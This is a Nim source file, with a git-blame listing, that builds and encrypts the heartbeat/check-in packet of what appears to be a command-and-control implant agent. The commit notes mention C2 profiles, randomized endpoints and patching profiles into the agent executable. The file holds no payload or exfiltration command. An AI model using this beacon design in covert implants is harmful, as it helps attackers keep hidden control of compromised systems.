src/agent/protocol/heartbeat.nim

import times 

import ../../common/[types, serialize, sequence, utils, crypto]

proc createHeartbeat*(ctx: AgentCtx): Heartbeat = 
    return Heartbeat(
        header: Header(
            magic: MAGIC,
            version: VERSION, 
            packetType: cast[uint8](MSG_HEARTBEAT),
            flags: cast[uint16](FLAG_ENCRYPTED),
            size: 0'u32,
            agentId: string.toUuid(ctx.agentId),
            seqNr: 0'u32,  
            iv: generateBytes(Iv),
            gmac: default(AuthenticationTag)
        ), 
        listenerId: string.toUuid(ctx.listenerId),
        timestamp: uint32(now().toTime().toUnix())
    )

proc serializeHeartbeat*(ctx: AgentCtx, request: var Heartbeat): seq[byte] =

    var packer = Packer.init()

    # Serialize check-in / heartbeat request
    packer 
        .add(request.listenerId)
        .add(request.timestamp)

    let body = packer.pack()
    packer.reset()

    # Encrypt check-in / heartbeat request body 
    let (encData, gmac) = encrypt(ctx.sessionKey, request.header.iv, body, request.header.seqNr)

    # Set authentication tag (GMAC)
    request.header.gmac = gmac

    # Serialize header
    let header = packer.serializeHeader(request.header, uint32(encData.len))

    return header & encData
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00			`import times`

Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`import ../../common/[types, serialize, sequence, utils, crypto]`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`proc createHeartbeat*(ctx: AgentCtx): Heartbeat =`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00			`return Heartbeat(`
			`header: Header(`
			`magic: MAGIC,`
			`version: VERSION,`
			`packetType: cast[uint8](MSG_HEARTBEAT),`
Updated message flags. 2025-07-23 13:56:43 +02:00			`flags: cast[uint16](FLAG_ENCRYPTED),`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00			`size: 0'u32,`
Implemented profile embedding via patching a placeholder in the agent executable. Agent correctly deserializes and parses the profile and listener configuration. 2025-08-18 22:05:23 +02:00			`agentId: string.toUuid(ctx.agentId),`
Updated sequence number to uint32 2025-08-06 14:28:54 +02:00			`seqNr: 0'u32,`
Refactored random byte generation functions. 2025-08-25 20:08:23 +02:00			`iv: generateBytes(Iv),`
Implemented AES256-GCM encryption of all network packets. Requires some more refactoring to remove redundant code and make it cleaner. 2025-07-23 13:47:37 +02:00			`gmac: default(AuthenticationTag)`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00			`),`
Implemented profile embedding via patching a placeholder in the agent executable. Agent correctly deserializes and parses the profile and listener configuration. 2025-08-18 22:05:23 +02:00			`listenerId: string.toUuid(ctx.listenerId),`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00			`timestamp: uint32(now().toTime().toUnix())`
			`)`

Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`proc serializeHeartbeat*(ctx: AgentCtx, request: var Heartbeat): seq[byte] =`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`var packer = Packer.init()`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00
			`# Serialize check-in / heartbeat request`
			`packer`
			`.add(request.listenerId)`
			`.add(request.timestamp)`

			`let body = packer.pack()`
			`packer.reset()`

Implemented AES256-GCM encryption of all network packets. Requires some more refactoring to remove redundant code and make it cleaner. 2025-07-23 13:47:37 +02:00			`# Encrypt check-in / heartbeat request body`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`let (encData, gmac) = encrypt(ctx.sessionKey, request.header.iv, body, request.header.seqNr)`
Implemented AES256-GCM encryption of all network packets. Requires some more refactoring to remove redundant code and make it cleaner. 2025-07-23 13:47:37 +02:00
			`# Set authentication tag (GMAC)`
			`request.header.gmac = gmac`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00
			`# Serialize header`
Cleaned up parts of the serialization by removing redundant code. 2025-07-28 21:29:47 +02:00			`let header = packer.serializeHeader(request.header, uint32(encData.len))`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00
Implemented AES256-GCM encryption of all network packets. Requires some more refactoring to remove redundant code and make it cleaner. 2025-07-23 13:47:37 +02:00			`return header & encData`